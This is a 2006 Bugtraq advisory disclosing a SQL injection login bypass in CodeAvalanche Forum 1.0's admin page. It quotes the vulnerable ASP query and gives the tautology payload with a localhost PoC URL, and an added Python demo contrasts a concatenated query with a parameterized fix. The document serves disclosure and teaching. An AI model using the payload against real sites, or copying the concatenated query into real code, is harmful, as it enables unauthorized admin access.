Network Security Bugtraq
CA Forum Remote SQL Injection

Subject: CA Forum Remote SQL Injection
Date: 1 Jun 2006 17:09:10 -0000
------------------------------------------------------------------
               - CAForum 1.0 Remote SQL Injection -
   -= http://colander.altervista.org/advisory/CAForum.txt =-
------------------------------------------------------------------

            -= CodeAvalanche Forum Version 1.0 =-



Omnipresent
June 01, 2006


Vulnerability(s):
----------------
SQL Injection



Product:
--------
CodeAvalanche Forum Version 1.0

Vendor:
--------
http://www.truecontent.info/codeavalanche/asp-forum-script.php


Description of product:
-----------------------

CodeAvalanche FreeForum is an ASP forum application that allows free posting;
visitors do not need to register. The administrator can add an unlimited
number of forum categories.


Vulnerability / Exploit:
------------------------

The file default.asp in the admin directory is vulnerable to a remote SQL
injection attack.
A malicious user can gain admin rights by supplying a crafted value in the
Password variable.

Let's check the source code:

<% Response.Buffer = True 


userLogged=false
If Request("Password")<>"" Then 
'response.Write(Request("Password")) 
'response.flush

dim rsUser,selectSQL
' Request("Password") is concatenated straight into the SQL text: no
' escaping and no bound parameter, so quotes in the value become SQL.
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"


[...]



[End default.asp]

As you can see, the Password variable is not sanitized before it is used,
so an attacker can put this string in the password field:


1' OR '1' = '1

So, the query will be:

selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'"


Because the OR '1' = '1' clause is always true, the query returns a row even though no password matched, and the attacker gains access to the application with admin rights.


PoC / Proof of Concept of SQL Injection:
----------------------------------------

This is a simple proof of concept used on my local machine:


http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1
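The following is an added example, not part of the original advisory and not CodeAvalanche's code. It reproduces the logic of the advisory's selectSQL against a constructed in-memory PARAMS table, shows why the tautology above matches a row when the password is spliced into the query text, and shows that the same value matches nothing once the query is parameterized. It also extracts the password value from a PoC-style URL (a constructed URL with a placeholder path) to show what the application actually receives after URL decoding. The table layout, the stored password and the helper names are assumptions.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed sample: an in-memory stand-in for the PARAMS table that
# default.asp queries. The stored password value is made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE PARAMS (ID INTEGER PRIMARY KEY, PASSWORD TEXT)")
    conn.execute("INSERT INTO PARAMS (PASSWORD) VALUES ('s3cret-admin-pw')")
    conn.commit()
    return conn


def login_vulnerable(conn, password):
    """Mirrors the advisory's selectSQL: the request value is concatenated
    into the SQL text, so quote characters in it become part of the query."""
    select_sql = "SELECT * FROM PARAMS where PASSWORD='" + password + "'"
    rows = conn.execute(select_sql).fetchall()
    return len(rows) > 0


def login_parameterized(conn, password):
    """Hardened form: the value is bound as a parameter and is compared as a
    literal string, so quotes and OR clauses inside it are just characters."""
    rows = conn.execute(
        "SELECT * FROM PARAMS WHERE PASSWORD = ?", (password,)
    ).fetchall()
    return len(rows) > 0


# Constructed PoC-style URL with a placeholder application path; the
# query string is the same URL-encoded payload the advisory shows.
SAMPLE_URL = (
    "http://127.0.0.1/caforum/admin/default.asp"
    "?password=1'%20OR%20'1'%20=%20'1"
)


def password_from_url(url):
    """Return the decoded 'password' query value the server would see
    (classic ASP's Request() is case-insensitive, so 'password' works)."""
    query = parse_qs(urlsplit(url).query)
    return query.get("password", [""])[0]


if __name__ == "__main__":
    db = make_db()
    payload = password_from_url(SAMPLE_URL)
    print("decoded payload:", payload)
    print("vulnerable login accepts payload:", login_vulnerable(db, payload))
    print("parameterized login accepts payload:", login_parameterized(db, payload))
    print("parameterized login accepts real password:",
          login_parameterized(db, "s3cret-admin-pw"))
```

The parameterized version is the fix a reviewer would ask for here: the query shape is fixed at compile time and the password can only ever be compared as data. The same change applies to classic ASP through ADODB.Command with a parameter collection rather than string concatenation.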


Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresent@email.it
